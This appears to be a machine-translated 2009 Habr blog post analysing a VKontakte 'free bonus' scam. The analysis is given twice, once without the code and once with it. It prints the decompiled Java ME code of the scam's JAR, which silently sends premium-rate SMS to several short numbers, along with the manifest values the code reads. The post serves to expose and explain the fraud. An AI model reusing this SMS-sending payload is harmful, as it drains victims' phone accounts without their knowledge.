Post in the sandbox, or I forgot that I have an account for a long time.
Somehow unnoticed the last couple of weeks began to look at the headlines on Habré, and suddenly stumbled upon a post that you can get an invite by writing a post in the sandbox. After looking at what is in this very sandbox and inspired by the 2.5 l Bagbier, bought to pause for youth, I added a small note (text below). Since it was almost 3 am, I was finally going to go to bed. But suddenly, updating the page with my post, I saw a strange message “Page not found (404th error)”. Meanwhile, an email was found in the mail. Having scored on 404 reasons and having been pleased to invite, I got to register. What was my surprise when I saw that the login is already taken. Then everything was simple - a link to recover the password on the email and login to the site. It turns out that I registered here already in July, but I completely forgot about it. Two questions remain incomprehensible: how did the invitee come to me (is it related to my post or not) and where did that post actually disappeared. )
Further, the disappeared text , and I am at a loss go bainki:
As it was written in the PPS of this topic about spam VKontakte (which, by the way, some have mistaken for fake ), “While I wrote the post, I received, unchecked so far, information that the virus removes 600 rubles from the account.”
I was always surprised by such “unverified information”, since it very much resembles “unverified information” of the form “send SMS to a short number and get 600 rubles free then,” just the opposite. So, let's see what will happen to the poor fellow who wants to get the coveted cash bonus nahalyavu?
We will follow his actions, although of course we will not repeat them exactly:
1. Go to the url mentioned in the topic http://vkpresents.ru/ and press the "Login" button. Yes, indeed, not so bad, "Your bonus at the moment is 500 rubles!"
2. Well, to get the bonus, you need to download the jar-ku at http://bonus.vkpresents.ru/yes/go.php?id=1 . We swing.
3. The most interesting thing is what does this mysterious jar do? First, let's unpack it: the content immediately pleased - ico.png file, META-INF directory (standard for jar) and HotSex.class file (!)
Actually in this hot file lies all the magic. As you know, Java programs are translated into bytecode executed by a virtual java machine , hence this bytecode should be fairly easy to decompile and restore the original Java code. We use a Java decompiler, for example jad or jd-gui .
So, this is how free cheese actually looks like:
')
Obviously, this code several times tries to send sms to different numbers, and the default is 1171. Let's see what else is in META-INF / MANIFEST.MF, where the code is accessed with getAppProperty ():
Here they are the very numbers where the malicious program is trying to send SMS :) The very first result of the SMS request to number 1171 in Google gives a link to the discussion of crooks who offer to send a free SMS, for which they take 5 USD for the end. So, if we take into account that attempts to send SMS are done in a code of only 8 and for each SMS they take 5 cu. - as a result, we get a rather impressive amount of $ 40, which will be debited from the account if you can successfully send all SMS. Fortunately, I don’t know about the exact amount, but the mentioned 600 rubles is probably an average value :)
So let's summarize. The layout is of course very weak, at least I think not one Habrachelovek will do this, and indeed the year 2009 is outside, it's time to think of something more original :) Nevertheless, the name of the class HotSex.class was pleased, apparently this jar -kha was taken from another layout, where it was offered to look at porn free then :)
Further, the disappeared text , and I am at a loss go bainki:
As it was written in the PPS of this topic about spam VKontakte (which, by the way, some have mistaken for fake ), “While I wrote the post, I received, unchecked so far, information that the virus removes 600 rubles from the account.”
I was always surprised by such “unverified information”, since it very much resembles “unverified information” of the form “send SMS to a short number and get 600 rubles free then,” just the opposite. So, let's see what will happen to the poor fellow who wants to get the coveted cash bonus nahalyavu?
We will follow his actions, although of course we will not repeat them exactly:
1. Go to the url mentioned in the topic http://vkpresents.ru/ and press the "Login" button. Yes, indeed, not so bad, "Your bonus at the moment is 500 rubles!"
2. Well, to get the bonus, you need to download the jar-ku at http://bonus.vkpresents.ru/yes/go.php?id=1 . We swing.
3. The most interesting thing is what does this mysterious jar do? First, let's unpack it: the content immediately pleased - ico.png file, META-INF directory (standard for jar) and HotSex.class file (!)
Actually in this hot file lies all the magic. As you know, Java programs are translated into bytecode executed by a virtual java machine , hence this bytecode should be fairly easy to decompile and restore the original Java code. We use a Java decompiler, for example jad or jd-gui .
So, this is how free cheese actually looks like:
')
public void startApp() {
String number;
MessageConnection messageconnection;
TextMessage textmessage;
for (int i = 0; i < 3; ) {
try {
number = "sms://1171";
if (i == 0)
number = "sms://" + getAppProperty("a");
if (i == 1)
number = "sms://" + getAppProperty("b");
if (i == 2)
number = "sms://" + getAppProperty("e");
messageconnection = (MessageConnection)Connector.open(number);
textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("kis"));
messageconnection.send(textmessage);
}
catch (Exception exception)
{
}
++i;
}
...
Obviously, this code several times tries to send sms to different numbers, and the default is 1171. Let's see what else is in META-INF / MANIFEST.MF, where the code is accessed with getAppProperty ():
kis: fasax 1340
wix: xasex 1340
a: 1171
b: 1161
c: 9099
d: 9099
e: 1161
Here they are the very numbers where the malicious program is trying to send SMS :) The very first result of the SMS request to number 1171 in Google gives a link to the discussion of crooks who offer to send a free SMS, for which they take 5 USD for the end. So, if we take into account that attempts to send SMS are done in a code of only 8 and for each SMS they take 5 cu. - as a result, we get a rather impressive amount of $ 40, which will be debited from the account if you can successfully send all SMS. Fortunately, I don’t know about the exact amount, but the mentioned 600 rubles is probably an average value :)
So let's summarize. The layout is of course very weak, at least I think not one Habrachelovek will do this, and indeed the year 2009 is outside, it's time to think of something more original :) Nevertheless, the name of the class HotSex.class was pleased, apparently this jar -kha was taken from another layout, where it was offered to look at porn free then :)
Source: https://habr.com/ru/post/50072/
All Articles